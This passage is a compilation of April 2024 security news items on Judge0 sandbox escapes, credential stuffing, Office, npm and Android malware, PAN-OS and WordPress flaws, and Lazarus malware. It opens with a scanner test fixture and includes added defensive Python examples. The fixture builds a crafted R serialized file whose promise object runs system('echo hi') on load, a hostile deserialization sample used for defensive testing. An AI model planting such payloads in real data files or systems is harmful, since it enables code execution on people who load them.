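HEADER = b"X\n" + _xdr(3, 0x040300, 0x030500, 5) + b"UTF-8"   # format 3, writer R 4.3.0, UTF-8
BENIGN_RDS = HEADER + _xdr(INTSXP, 3, 1, 2, 3)                    # c(1L, 2L, 3L)
# The advisory's shape: a promise whose value is the unbound marker and whose code is a
# call, so the first touch of the symbol evaluates system("echo hi") in the global env.
PROMISE_RDS = (HEADER + _xdr(PROMSXP | HAS_TAG, GLOBALENV_SXP, UNBOUNDVALUE_SXP)
               + _xdr(LANGSXP, SYMSXP) + _char(b"system")
               + _xdr(LISTSXP, STRSXP, 1) + _char(b"echo hi") + _xdr(NILVALUE_SXP))
PROMISE_RDS_GZ = gzip.compress(PROMISE_RDS)
```

A legitimate data file produced by saveRDS() contains vectors, lists, strings and attributes; a promise node anywhere in it has no honest reason to be there, so any hit is a reject, and a file the walker cannot parse deserves the same treatment until someone looks at it. The fix in R 4.4.0 is the durable answer; this scan is for the files you receive before every consumer has upgraded.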
Sandbox Escape Vulnerabilities in Judge0 Expose Systems to Complete Takeover
30.4.24
Vulnerability
The Hacker News
Multiple critical security flaws have been disclosed in the Judge0 open-source online code execution system that could be exploited to obtain code execution on the target system.
The three flaws, all critical in nature, allow an "adversary with sufficient access to perform a sandbox escape and obtain root permissions on the host machine," Australian cybersecurity firm Tanto Security said in a report published today.
Judge0 (pronounced "judge zero") is described by its maintainers as a "robust, scalable, and open-source online code execution system" that can be used to build applications that require online code execution features such as candidate assessment, e-learning, and online code editors and IDEs.
According to its website, the service is used by 23 customers like AlgoDaily, CodeChum, and PYnative, among others. The project has been forked 412 times on GitHub to date.
The flaws, discovered and reported by Daniel Cooper in March 2024, are listed below -
CVE-2024-28185 (CVSS score: 10.0) - The application does not account for symlinks placed inside the sandbox directory, which can be leveraged by an attacker to write to arbitrary files and gain code execution outside of the sandbox.
CVE-2024-28189 (CVSS score: 10.0) - A patch bypass for CVE-2024-28185 that stems from the use of the UNIX chown command on an untrusted file within the sandbox. An attacker can abuse this by creating a symbolic link (symlink) to a file outside the sandbox, allowing the attacker to run chown on arbitrary files outside of the sandbox.
CVE-2024-29021 (CVSS score: 9.1) - The default configuration of Judge0 leaves the service vulnerable to a sandbox escape via Server-Side Request Forgery (SSRF). This allows an attacker with sufficient access to the Judge0 API to obtain unsandboxed code execution as root on the target machine.
The problem is rooted in a Ruby script named "isolate_job.rb," which is responsible for setting up the sandbox, as well as running the code and storing the results of the execution.
Specifically, it entails creating a symbolic link in the directory before a bash script is set up to execute the program based on the submission language such that it allows writing to an arbitrary file on the unsandboxed system.
A threat actor could leverage this flaw to overwrite scripts on the system and gain code execution outside of the sandbox and on the Docker container running the submission job.
What's more, the attacker could escalate their privileges outside of the Docker container due to it being run using the privileged flag as specified in docker-compose.yml.
"This will allow the attacker to mount the Linux host filesystem and the attacker can then write files (for example a malicious cron job) to gain access to the system," Judge0's Herman Došilović said.
"From this point the attacker will have complete access to the Judge0 system including the database, internal networks, the Judge0 web server, and any other applications running on the Linux host."
CVE-2024-29021, on the other hand, has to do with a configuration that permits communicating with Judge0's PostgreSQL database available inside the internal Docker network, thus enabling the adversary to weaponize the SSRF to connect to the database and change the datatype of relevant columns and ultimately gain command injection.
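The file-handling discipline that the first two flaws call for, as an added example for this page and not Judge0's isolate_job.rb (which is Ruby; the technique is the same in any language): every path component is opened O_NOFOLLOW relative to the previous directory descriptor, so a link the submitted program planted inside the sandbox is refused whether it is the result file itself (CVE-2024-28185) or the argument to chown (CVE-2024-28189), and there is no check-then-use window for a racing submission to swap a file for a link. The demo scenario, the directory layout and the file names are constructed; it needs a POSIX system with dir_fd support:

```python
"""Symlink-safe result handling for a code-execution sandbox, in the spirit of the
Judge0 fixes. Added example, not Judge0's isolate_job.rb: every path component is
opened O_NOFOLLOW relative to the previous directory descriptor, so a link planted
inside the sandbox (CVE-2024-28185) or handed to chown (CVE-2024-28189) is refused
without a check-then-use window. POSIX only (dir_fd support)."""
import os
import tempfile
from pathlib import Path


def open_in_sandbox(sandbox_fd, rel, flags, mode=0o600):
    """Open sandbox/<rel> without following symlinks at any depth; returns an fd."""
    parts = Path(rel).parts
    if not parts or Path(rel).is_absolute() or ".." in parts:
        raise PermissionError(f"refusing path {rel!r}")
    fd = sandbox_fd
    try:
        for comp in parts[:-1]:                   # descend one directory at a time
            nxt = os.open(comp, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW, dir_fd=fd)
            if fd != sandbox_fd:
                os.close(fd)
            fd = nxt
        return os.open(parts[-1], flags | os.O_NOFOLLOW, mode, dir_fd=fd)
    except OSError as exc:                        # ELOOP/EMLINK on a symlink, ENOTDIR, ...
        raise PermissionError(f"refusing {rel!r}: {exc.strerror}") from None
    finally:
        if fd != sandbox_fd:
            os.close(fd)


def write_result(sandbox_fd, rel, data):
    """What the job runner does with stdout/stderr of the submission."""
    fd = open_in_sandbox(sandbox_fd, rel, os.O_WRONLY | os.O_CREAT | os.O_TRUNC)
    try:
        os.write(fd, data)
    finally:
        os.close(fd)


def safe_chown(sandbox_fd, rel, uid, gid):
    """chown the file itself, never the target of a link (fchown on an O_NOFOLLOW fd)."""
    fd = open_in_sandbox(sandbox_fd, rel, os.O_RDONLY)
    try:
        os.fchown(fd, uid, gid)
    finally:
        os.close(fd)


def demo():
    """Constructed scenario: links inside the sandbox aimed at a file outside it."""
    root = Path(tempfile.mkdtemp())
    outside = root / "outside.txt"
    outside.write_text("untouched\n")
    sandbox = root / "box"
    (sandbox / "sub").mkdir(parents=True)
    os.symlink(outside, sandbox / "result.txt")        # planted by the submitted program
    os.symlink(root, sandbox / "sub" / "escape")       # symlinked directory, same idea
    sfd = os.open(sandbox, os.O_RDONLY | os.O_DIRECTORY)
    out = {}
    try:
        for rel in ("result.txt", "sub/escape/outside.txt", "../outside.txt", "sub/real.txt"):
            try:
                write_result(sfd, rel, b"pwned\n")
                out[rel] = "written"
            except PermissionError:
                out[rel] = "refused"
        try:
            safe_chown(sfd, "result.txt", -1, -1)     # -1, -1: leave the ids unchanged
            out["chown result.txt"] = "followed"
        except PermissionError:
            out["chown result.txt"] = "refused"
    finally:
        os.close(sfd)
    out["outside_intact"] = outside.read_text() == "untouched\n"
    return out


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:28} {v}")
```

Note what O_NOFOLLOW alone does not buy you: it only governs the final component, which is why the intermediate directories are opened the same way, and why a path-string check such as realpath() before the open is not equivalent (the link can appear between the check and the open). Dropping the privileged flag on the container, the third problem the advisory names, is a separate fix in the compose file.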
Following responsible disclosure, the shortcomings have been addressed in version 1.13.1 released on April 18, 2024. Users of Judge0 are advised to update to the latest version to mitigate potential threats.
Okta Warns of Unprecedented Surge in Proxy-Driven Credential Stuffing Attacks
30.4.24
Hacking
The Hacker News
Identity and access management (IAM) services provider Okta has warned of a spike in the "frequency and scale" of credential stuffing attacks aimed at online services.
These unprecedented attacks, observed over the last month, are said to be facilitated by "the broad availability of residential proxy services, lists of previously stolen credentials ('combo lists'), and scripting tools," the company said in an alert published Saturday.
The findings build on a recent advisory from Cisco, which cautioned of a global surge in brute-force attacks targeting various devices, including Virtual Private Network (VPN) services, web application authentication interfaces, and SSH services, since at least March 18, 2024.
"These attacks all appear to be originating from TOR exit nodes and a range of other anonymizing tunnels and proxies," Talos noted at the time, adding targets of the attacks comprise VPN appliances from Cisco, Check Point, Fortinet, SonicWall, as well as routers from Draytek, MikroTik, and Ubiquiti.
Okta said its Identity Threat Research detected an uptick in credential stuffing activity against user accounts from April 19 to April 26, 2024, from likely similar infrastructure.
Credential stuffing is a type of cyber attack in which credentials obtained from a data breach on one service are used to attempt to sign in to another unrelated service.
Alternatively, such credentials could be extracted via phishing attacks that redirect victims to credential harvesting pages or through malware campaigns that install information stealers on compromised systems.
"All recent attacks we have observed share one feature in common: they rely on requests being routed through anonymizing services such as TOR," Okta said.
"Millions of the requests were also routed through a variety of residential proxies including NSOCKS, Luminati, and DataImpulse."
Residential proxies (RESIPs) refer to networks of legitimate user devices that are misused to route traffic on behalf of paying subscribers without their knowledge or consent, thereby allowing threat actors to conceal their malicious traffic.
This is typically achieved by installing proxyware tools on computers, mobile phones, or routers, effectively enrolling them into a botnet that's then rented to customers of the service who desire to anonymize the source of their traffic.
"Sometimes a user device is enrolled in a proxy network because the user consciously chooses to download 'proxyware' into their device in exchange for payment or something else of value," Okta explained.
"At other times, a user device is infected with malware without the user's knowledge and becomes enrolled in what we would typically describe as a botnet."
Last month, HUMAN's Satori Threat Intelligence team revealed over two dozen malicious Android VPN apps that turn mobile devices into RESIPs by means of an embedded software development kit (SDK) that included the proxyware functionality.
"The net sum of this activity is that most of the traffic in these credential stuffing attacks appear to originate from the mobile devices and browsers of everyday users, rather than from the IP space of VPS providers," Okta said.
To mitigate the risk of account takeovers, the company recommends that organizations require users to switch to strong passwords, enable two-factor authentication (2FA), deny requests originating from locations where they don't operate and from IP addresses with poor reputation, and add support for passkeys.
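The following is an added example, not code from the article or from Okta: a small detector that applies the deny rules above (requests from regions where the organization does not operate, requests from poor-reputation IPs) to authentication logs, plus an assumed heuristic for the stuffing pattern itself, a single source that cycles through many distinct usernames with a high failure rate. The log lines, the IP-to-country table and the reputation list are all constructed for the example.

```python
"""Credential-stuffing triage over authentication logs (added example).

Assumptions: logs are one event per line as
"<timestamp> <SUCCESS|FAILURE> <username> <source-ip>", geolocation and
reputation come from in-memory tables (constructed here), and the
organisation only operates in the countries listed in ALLOWED_COUNTRIES.
"""
from collections import defaultdict

# Constructed: the (hypothetical) organisation only serves users in DE and US.
ALLOWED_COUNTRIES = {"DE", "US"}

# Constructed geolocation table standing in for a GeoIP lookup.
IP_COUNTRY = {
    "203.0.113.7": "DE",      # residential-proxy exit, looks like an everyday user
    "198.51.100.22": "BR",    # outside the operating regions
    "192.0.2.99": "US",       # known-bad source (see POOR_REPUTATION)
    "203.0.113.200": "DE",    # ordinary user who mistyped once
}

# Constructed threat-intel list of IPs with poor reputation.
POOR_REPUTATION = {"192.0.2.99"}

# Constructed sample log: one source trying six different accounts in a row.
SAMPLE_LOG = """\
2024-04-20T10:00:01Z FAILURE alice 203.0.113.7
2024-04-20T10:00:02Z FAILURE bob 203.0.113.7
2024-04-20T10:00:03Z FAILURE carol 203.0.113.7
2024-04-20T10:00:04Z FAILURE dave 203.0.113.7
2024-04-20T10:00:05Z FAILURE erin 203.0.113.7
2024-04-20T10:00:06Z FAILURE frank 203.0.113.7
2024-04-20T10:01:10Z SUCCESS carol 198.51.100.22
2024-04-20T10:02:15Z FAILURE dave 192.0.2.99
2024-04-20T10:03:20Z FAILURE erin 203.0.113.200
2024-04-20T10:03:31Z SUCCESS erin 203.0.113.200
"""


def parse_log(text):
    """Parse the constructed log format into a list of event dicts."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ts, outcome, user, ip = line.split()
        events.append({"ts": ts, "outcome": outcome, "user": user, "ip": ip})
    return events


def analyze(events, min_users=5, min_failure_rate=0.8,
            allowed_countries=ALLOWED_COUNTRIES, ip_country=IP_COUNTRY,
            poor_reputation=POOR_REPUTATION):
    """Return {source_ip: [reasons]} for every source that trips a rule.

    Rule 1 (assumed heuristic): many distinct usernames from one source with a
    high failure rate, the signature of a combo list being replayed.
    Rule 2 and 3 (from the Okta alert): traffic from countries where the
    organisation does not operate, and from poor-reputation IPs.
    """
    per_ip = defaultdict(lambda: {"users": set(), "attempts": 0, "failures": 0})
    for ev in events:
        stats = per_ip[ev["ip"]]
        stats["users"].add(ev["user"])
        stats["attempts"] += 1
        if ev["outcome"] == "FAILURE":
            stats["failures"] += 1

    findings = {}
    for ip, stats in per_ip.items():
        reasons = []
        failure_rate = stats["failures"] / stats["attempts"]
        if len(stats["users"]) >= min_users and failure_rate >= min_failure_rate:
            reasons.append(f"{len(stats['users'])} distinct usernames, "
                           f"{failure_rate:.0%} failures")
        country = ip_country.get(ip, "??")
        if country not in allowed_countries:
            reasons.append(f"request from {country}, outside operating regions")
        if ip in poor_reputation:
            reasons.append("source IP on poor-reputation list")
        if reasons:
            findings[ip] = reasons
    return findings


if __name__ == "__main__":
    for ip, reasons in analyze(parse_log(SAMPLE_LOG)).items():
        print(ip, "->", "; ".join(reasons))
```

A real deployment would feed the same per-source statistics from an IdP's system log export and replace the in-memory tables with GeoIP and threat-intel lookups; the thresholds are starting points, not tuned values.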
Ukraine Targeted in Cyberattack Exploiting 7-Year-Old Microsoft Office Flaw
30.4.24
Vulnerability
The Hacker News
Cybersecurity researchers have discovered a targeted operation against Ukraine that has been found leveraging a nearly seven-year-old flaw in Microsoft Office to deliver Cobalt Strike on compromised systems.
The attack chain, which took place at the end of 2023 according to Deep Instinct, employs a PowerPoint slideshow file ("signal-2023-12-20-160512.ppsx") as the starting point, with the filename implying that it may have been shared via the Signal instant messaging app.
That said, there is no actual evidence to indicate that the PPSX file was distributed in this manner, even though the Computer Emergency Response Team of Ukraine (CERT-UA) has uncovered two different campaigns that have used the messaging app as a malware delivery vector in the past.
Just last week, the agency disclosed that Ukrainian armed forces are being increasingly targeted by the UAC-0184 group via messaging and dating platforms to serve malware like HijackLoader (aka GHOSTPULSE and SHADOWLADDER), XWorm, and Remcos RAT, as well as open-source programs such as sigtop and tusc to exfiltrate data from computers.
"The PPSX (PowerPoint slideshow) file appears to be an old instruction manual of the U.S. Army for mine clearing blades (MCB) for tanks," security researcher Ivan Kosarev said. "The PPSX file includes a remote relationship to an external OLE object."
This involves the exploitation of CVE-2017-8570 (CVSS score: 7.8), a now-patched remote code execution bug in Office that could allow an attacker to perform arbitrary actions upon convincing a victim to open a specially crafted file, to load a remote script hosted on weavesilk[.]space.
The heavily obfuscated script subsequently launches an HTML file containing JavaScript code, which, in turn, sets up persistence on the host via the Windows Registry and drops a next-stage payload that impersonates the Cisco AnyConnect VPN client.
The payload includes a dynamic-link library (DLL) that ultimately injects a cracked Cobalt Strike Beacon, a legitimate pen-testing tool, directly into system memory and awaits further instructions from a command-and-control (C2) server ("petapixel[.]fun").
The DLL also packs in features to check if it's being executed in a virtual machine and evade detection by security software.
Deep Instinct said it could neither link the attacks to a specific threat actor or group nor exclude the possibility of a red teaming exercise. Also unclear is the exact end goal of the intrusion.
"The lure contained military-related content, suggesting it was targeting military personnel," Kosarev said.
"But the domain names weavesilk[.]space and petapixel[.]fun are disguised as an obscure generative art site (weavesilk[.]com) and a popular photography site (petapixel[.]com). These are unrelated, and it's a bit puzzling why an attacker would use these specifically to fool military personnel."
Sandworm Targets Critical Infra in Ukraine
The disclosure comes as CERT-UA revealed that about 20 energy, water, and heating suppliers in Ukraine have been targeted by a Russian state-sponsored group called UAC-0133, a sub-cluster within Sandworm (aka APT44, FROZENBARENTS, Seashell Blizzard, UAC-0002, and Voodoo Bear), which is responsible for the bulk of all the disruptive and destructive operations against the country.
The attacks, which aimed to sabotage critical operations, involve the use of malware like Kapeka (aka ICYWELL, KnuckleTouch, QUEUESEED, and wrongsens) and its Linux variant BIASBOAT, in addition to GOSSIPFLOW and LOADGRIP.
While GOSSIPFLOW is a Golang-based SOCKS5 proxy, LOADGRIP is an ELF binary written in C that's used to load BIASBOAT on compromised Linux hosts.
Sandworm is a prolific and highly adaptive threat group linked to Unit 74455 within the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU). It's known to have been active since at least 2009, and the adversary is also tied to three hack-and-leak hacktivist personas: XakNet Team, CyberArmyofRussia_Reborn, and Solntsepek.
"Sponsored by Russian military intelligence, APT44 is a dynamic and operationally mature threat actor that is actively engaged in the full spectrum of espionage, attack, and influence operations," Mandiant said, describing the advanced persistent threat (APT) as engaged in a multi-pronged effort to help Russia gain a wartime advantage since January 2022.
"APT44 operations are global in scope and mirror Russia's wide ranging national interests and ambitions. Patterns of activity over time indicate that APT44 is tasked with a range of different strategic priorities and is highly likely seen by the Kremlin as a flexible instrument of power capable of serving both enduring and emerging intelligence requirements."
Bogus npm Packages Used to Trick Software Developers into Installing Malware
30.4.24
Virus
The Hacker News
An ongoing social engineering campaign is targeting software developers with bogus npm packages under the guise of a job interview to trick them into downloading a Python backdoor.
Cybersecurity firm Securonix is tracking the activity under the name DEV#POPPER, linking it to North Korean threat actors.
"During these fraudulent interviews, the developers are often asked to perform tasks that involve downloading and running software from sources that appear legitimate, such as GitHub," security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said. "The software contained a malicious Node JS payload that, once executed, compromised the developer's system."
Details of the campaign first emerged in late November 2023, when Palo Alto Networks Unit 42 detailed an activity cluster dubbed Contagious Interview in which the threat actors pose as employers to lure software developers into installing malware such as BeaverTail and InvisibleFerret through the interview process.
Then earlier this February, software supply chain security firm Phylum uncovered a set of malicious packages on the npm registry that delivered the same malware families to siphon sensitive information from compromised developer systems.
It's worth noting that Contagious Interview is said to be disparate from Operation Dream Job (aka DeathNote or NukeSped), with Unit 42 telling The Hacker News that the former is "focused on targeting developers, mainly through fake identities in freelance job portals, and the next stages involve the use of developer tools and npm packages leading to [...] BeaverTail and InvisibleFerret."
Operation Dream Job, linked to the prolific Lazarus Group from North Korea, is a long-running offensive campaign that sends unsuspecting professionals employed in various sectors like aerospace, cryptocurrency, defense, and others malicious files dressed as job offers to distribute malware.
First uncovered by Israeli cybersecurity firm ClearSky at the start of 2020, it also exhibits overlaps with two other Lazarus clusters known as Operation In(ter)ception and Operation North Star.
The attack chain detailed by Securonix starts with a ZIP archive hosted on GitHub that's likely sent to the target as part of the interview. Present within the file is a seemingly innocuous npm module that harbors a malicious JavaScript file codenamed BeaverTail that acts as an information stealer and a loader for a Python backdoor called InvisibleFerret that's retrieved from a remote server.
The implant, besides gathering system information, is capable of command execution, file enumeration and exfiltration, and clipboard and keystroke logging.
The development is a sign that North Korean threat actors continue to hone a raft of weapons for their cyber attack arsenal, consistently updating their tradecraft with improved abilities to hide their actions and blend in on host systems and networks, not to mention siphon off data and turn compromises into financial gain.
"When it comes to attacks which originate through social engineering, it's critical to maintain a security-focused mindset, especially during intense and stressful situations like job interviews," Securonix researchers said.
"The attackers behind the DEV#POPPER campaigns abuse this, knowing that the person on the other end is in a highly distracted and in a much more vulnerable state."
Severe Flaws Disclosed in Brocade SANnav SAN Management Software
27.4.24
Vulnerability
The Hacker News
Several security vulnerabilities disclosed in the Brocade SANnav storage area network (SAN) management application could be exploited to compromise susceptible appliances.
The 18 flaws impact all versions up to and including 2.3.0, according to independent security researcher Pierre Barre, who discovered and reported them.
The issues range from incorrect firewall rules, insecure root access, and Docker misconfigurations to lack of authentication and encryption, thus allowing an attacker to intercept credentials, overwrite arbitrary files, and completely breach the device.
Some of the most severe flaws are listed below -
CVE-2024-2859 (CVSS score: 8.8) - A vulnerability that could allow an unauthenticated, remote attacker to log in to an affected device using the root account and execute arbitrary commands.
CVE-2024-29960 (CVSS score: 7.5) - The use of hard-coded SSH keys in the OVA image, which could be exploited by an attacker to decrypt the SSH traffic to the SANnav appliance and compromise it.
CVE-2024-29961 (CVSS score: 8.2) - A vulnerability that can allow an unauthenticated, remote attacker to stage a supply chain attack by taking advantage of the fact that the SANnav service sends ping commands in the background at periodic intervals to the domains gridgain[.]com and ignite.apache[.]org to check for updates.
CVE-2024-29963 (CVSS score: 8.6) - The use of hard-coded Docker keys in the SANnav OVA to reach remote registries over TLS, thereby allowing an attacker to carry out an adversary-in-the-middle (AitM) attack on the traffic.
CVE-2024-29966 (CVSS score: 7.5) - The presence of hard-coded credentials for root users in publicly-available documentation that could permit an unauthenticated attacker full access to the Brocade SANnav appliance.
Following responsible disclosure twice, in August 2022 and May 2023, the flaws have been addressed in SANnav version 2.3.1 released in December 2023. Brocade's parent company Broadcom, which also owns Symantec and VMware, released advisories for the flaws earlier this month.
Hewlett Packard Enterprise has also shipped patches for a subset of these vulnerabilities in HPE SANnav Management Portal versions 2.3.0a and 2.3.1 as of April 18, 2024.
New 'Brokewell' Android Malware Spread Through Fake Browser Updates
27.4.24
OS
The Hacker News
Fake browser updates are being used to push a previously undocumented Android malware called Brokewell.
"Brokewell is a typical modern banking malware equipped with both data-stealing and remote-control capabilities built into the malware," Dutch security firm ThreatFabric said in an analysis published Thursday.
The malware is said to be in active development, adding new commands to capture touch events, textual information displayed on screen, and the applications a victim launches.
The list of Brokewell apps that masquerade as Google Chrome, ID Austria, and Klarna is as follows -
jcwAz.EpLIq.vcAZiUGZpK (Google Chrome)
zRFxj.ieubP.lWZzwlluca (ID Austria)
com.brkwl.upstracking (Klarna)
Like other recent Android malware families of its kind, Brokewell is capable of getting around restrictions imposed by Google that prevent sideloaded apps from requesting accessibility service permissions.
The banking trojan, once installed and launched for the first time, prompts the victim to grant permissions to the accessibility service, which it subsequently uses to automatically grant other permissions and carry out various malicious activities.
This includes displaying overlay screens on top of targeted apps to pilfer user credentials. It can also steal cookies by launching a WebView and loading the legitimate website, after which the session cookies are intercepted and transmitted to an actor-controlled server.
Some of the other features of Brokewell include the ability to record audio, take screenshots, retrieve call logs, access device location, list installed apps, record every event happening on the device, send SMS messages, make phone calls, install and uninstall apps, and even disable the accessibility service.
The threat actors can also leverage the malware's remote control functionality to see what's displayed on screen in real-time, as well as interact with the device through clicks, swipes, and touches.
Brokewell is said to be the work of a developer who goes by the name "Baron Samedit Marais" and manages the "Brokewell Cyber Labs" project, which also includes an Android Loader publicly hosted on Gitea.
The loader is designed to act as a dropper that bypasses accessibility permissions restrictions in Android versions 13, 14, and 15 using a technique previously adopted by dropper-as-a-service (DaaS) offerings like SecuriDropper and deploy the trojan implant.
By default, the loader apps generated through this process have the package name "com.brkwl.apkstore," although this can be configured by the user by either providing a specific name or enabling the random package name generator.
The free availability of the loader means it could be embraced by other threat actors looking to sidestep Android's security protections.
"Second, existing 'Dropper-as-a-Service' offerings that currently provide this capability as a distinctive feature will likely either close their services or attempt to reorganize," ThreatFabric said.
"This further lowers the entry barrier for cybercriminals looking to distribute mobile malware on modern devices, making it easier for more actors to enter the field."
Update
A Google spokesperson shared the below statement with The Hacker News -
"Android users are automatically protected against known versions of this malware by Google Play Protect, which is on by default on Android devices with Google Play Services. Google Play Protect can warn users or block apps known to exhibit malicious behavior, even when those apps come from sources outside of Play."
Palo Alto Networks Outlines Remediation for Critical PAN-OS Flaw Under Attack
27.4.24
Vulnerability
The Hacker News
Palo Alto Networks has shared remediation guidance for a recently disclosed critical security flaw impacting PAN-OS that has come under active exploitation.
The vulnerability, tracked as CVE-2024-3400 (CVSS score: 10.0), could be weaponized to obtain unauthenticated remote shell command execution on susceptible devices. It has been addressed in multiple versions of PAN-OS 10.2.x, 11.0.x, and 11.1.x.
There is evidence to suggest that the issue has been exploited as a zero-day since at least March 26, 2024, by a threat cluster tracked as UTA0218.
The activity, codenamed Operation MidnightEclipse, entails the use of the flaw to drop a Python-based backdoor called UPSTYLE that's capable of executing commands transmitted via specially crafted requests.
The intrusions have not been linked to a known threat actor or group, but it's suspected to be a state-backed hacking crew given the tradecraft and the victimology observed.
The latest remediation advice offered by Palo Alto Networks is based on the extent of compromise -
Level 0 Probe: Unsuccessful exploitation attempt - Update to the latest provided hotfix
Level 1 Test: Evidence of the vulnerability being tested on the device, including the creation of an empty file on the firewall but no execution of unauthorized commands - Update to the latest provided hotfix
Level 2 Potential Exfiltration: Signs that files like "running_config.xml" were copied to a location that is accessible via web requests - Update to the latest provided hotfix and perform a Private Data Reset
Level 3 Interactive access: Evidence of interactive command execution, such as the introduction of backdoors and other malicious code - Update to the latest provided hotfix and perform a Factory Reset
"Performing a private data reset eliminates risks of potential misuse of device data," Palo Alto Networks said. "A factory reset is recommended due to evidence of more invasive threat actor activity."
Hackers Exploiting WP-Automatic Plugin Bug to Create Admin Accounts on WordPress Sites
27.4.24
Exploit
The Hacker News
Threat actors are attempting to actively exploit a critical security flaw in the ValvePress Automatic plugin for WordPress that could allow site takeovers.
The shortcoming, tracked as CVE-2024-27956, carries a CVSS score of 9.9 out of a maximum of 10. It impacts all versions of the plugin prior to 3.92.0. The issue has been resolved in version 3.92.1 released on February 27, 2024, although the release notes make no mention of it.
"This vulnerability, a SQL injection (SQLi) flaw, poses a severe threat as attackers can exploit it to gain unauthorized access to websites, create admin-level user accounts, upload malicious files, and potentially take full control of affected sites," WPScan said in an alert this week.
According to the Automattic-owned company, the issue is rooted in the plugin's user authentication mechanism, which can be trivially circumvented to execute arbitrary SQL queries against the database by means of specially crafted requests.
In the attacks observed so far, CVE-2024-27956 is being used to run unauthorized database queries and create new admin accounts on susceptible WordPress sites (e.g., with names starting with "xtw"), which could then be leveraged for follow-on post-exploitation actions.
This includes installing plugins that make it possible to upload files or edit code, indicating attempts to repurpose the infected sites as stagers.
"Once a WordPress site is compromised, attackers ensure the longevity of their access by creating backdoors and obfuscating the code," WPScan said. "To evade detection and maintain access, attackers may also rename the vulnerable WP-Automatic file, making it difficult for website owners or security tools to identify or block the issue."
The file in question is "/wp-content/plugins/wp-automatic/inc/csv.php," which is renamed to something like "/wp-content/plugins/wp-automatic/inc/csv65f82ab408b3.php."
That said, it's possible that the threat actors are doing so in an attempt to prevent other attackers from exploiting the sites already under their control.
CVE-2024-27956 was publicly disclosed by WordPress security firm Patchstack on March 13, 2024. Since then, more than 5.5 million attack attempts to weaponize the flaw have been detected in the wild.
The disclosure comes as severe bugs have been disclosed in plugins like Email Subscribers by Icegram Express (CVE-2024-2876, CVSS score: 9.8), Forminator (CVE-2024-28890, CVSS score: 9.8), and User Registration (CVE-2024-2417, CVSS score: 8.8) that could be used to extract sensitive data like password hashes from the database, upload arbitrary files, and grant an authenticated user admin privileges.
Patchstack has also warned of an unpatched issue in the Poll Maker plugin (CVE-2024-32514, CVSS score: 9.9) that allows for authenticated attackers, with subscriber-level access and above, to upload arbitrary files on the affected site's server, leading to remote code execution.
North Korea's Lazarus Group Deploys New Kaolin RAT via Fake Job Lures
27.4.24
Virus
The Hacker News
The North Korea-linked threat actor known as Lazarus Group employed its time-tested fabricated job lures to deliver a new remote access trojan called Kaolin RAT as part of attacks targeting specific individuals in the Asia region in summer 2023.
The malware could, "aside from standard RAT functionality, change the last write timestamp of a selected file and load any received DLL binary from [command-and-control] server," Avast security researcher Luigino Camastra said in a report published last week.
The RAT acts as a pathway to deliver the FudModule rootkit, which has been recently observed leveraging a now-patched admin-to-kernel exploit in the appid.sys driver (CVE-2024-21338, CVSS score: 7.8) to obtain a kernel read/write primitive and ultimately disable security mechanisms.
The Lazarus Group's use of job offer lures to infiltrate targets is not new. Dubbed Operation Dream Job, the long-running campaign has a track record of using various social media and instant messaging platforms to deliver malware.
These initial access vectors trick targets into launching a malicious optical disc image (ISO) file bearing three files, one of which masquerades as an Amazon VNC client ("AmazonVNC.exe") that, in reality, is a renamed version of a legitimate Windows application called "choice.exe."
The two other files, named "version.dll" and "aws.cfg," act as a catalyst to kick-start the infection chain. Specifically, the executable "AmazonVNC.exe" is used to side-load "version.dll," which, in turn, spawns an IExpress.exe process and injects into it a payload residing within "aws.cfg."
The payload is designed to download shellcode from a command-and-control (C2) domain ("henraux[.]com"), which is suspected to be an actual-but-hacked website belonging to an Italian company that specializes in excavating and processing marble and granite.
While the exact nature of the shellcode is unclear, it's said to be used to launch RollFling, a DLL-based loader that serves to retrieve and launch the next-stage malware named RollSling, which was disclosed by Microsoft last year in connection with a Lazarus Group campaign exploiting a critical JetBrains TeamCity flaw (CVE-2023-42793, CVSS score: 9.8).
RollSling, executed directly in memory in a likely attempt to evade detection by security software, represents the next phase of the infection procedure. Its primary function is to trigger the execution of a third loader dubbed RollMid that's also run in the system's memory.
RollMid comes fitted with capabilities to set the stage for the attack and establish contact with a C2 server, which involves a three-step process of its own as follows -
Communicate with the first C2 server to fetch an HTML file containing the address of the second C2 server
Communicate with the second C2 server to fetch a PNG image that embeds a malicious component using a technique called steganography
Transmit data to the third C2 server using the address specified in the concealed data within the image
Retrieve an additional Base64-encoded data blob from the third C2 server, which is the Kaolin RAT
The technical sophistication behind the multi-stage sequence, while no doubt complex and intricate, borders on overkill, Avast opined, with the Kaolin RAT paving the way for the deployment of the FudModule rootkit after setting up communications with the RAT's C2 server.
On top of that, the malware is equipped to enumerate files; carry out file operations; upload files to the C2 server; alter a file's last modified timestamp; enumerate, create, and terminate processes; execute commands using cmd.exe; download DLL files from the C2 server; and connect to an arbitrary host.
"The Lazarus group targeted individuals through fabricated job offers and employed a sophisticated toolset to achieve better persistence while bypassing security products," Camastra said.
"It is evident that they invested significant resources in developing such a complex attack chain. What is certain is that Lazarus had to innovate continuously and allocate enormous resources to research various aspects of Windows mitigations and security products. Their ability to adapt and evolve poses a significant challenge to cybersecurity efforts."
DOJ Arrests Founders of Crypto Mixer Samourai for $2 Billion in Illegal Transactions
27.4.24
Cryptocurrency
The Hacker News
The U.S. Department of Justice (DoJ) on Wednesday announced the arrest of two co-founders of a cryptocurrency mixer called Samourai and seized the service for allegedly facilitating over $2 billion in illegal transactions and for laundering more than $100 million in criminal proceeds.
To that end, Keonne Rodriguez, 35, and William Lonergan Hill, 65, have been charged with conspiracy to commit money laundering and conspiracy to operate an unlicensed money transmitting business from 2015 through February 2024. Rodriguez and Hill face a maximum sentence of 25 years in prison each.
Rodriguez, the CEO of the company, and CTO Hill intentionally designed Samourai to help "criminals to engage in large-scale money laundering and sanctions evasion," while ostensibly marketing it as a privacy-oriented service, the DoJ said.
Samourai laundered money from illegal dark web marketplaces, including Silk Road and Hydra, as well as spear-phishing schemes and scams aimed at defrauding multiple decentralized finance protocols.
The operation, which also involved law enforcement agencies from Iceland and Portugal, along with Europol, saw its digital infrastructure confiscated and its Android app pulled from the Google Play Store in the U.S. Hill, who was apprehended in Portugal, is awaiting his extradition to the U.S. Rodriguez was taken into custody in Pennsylvania.
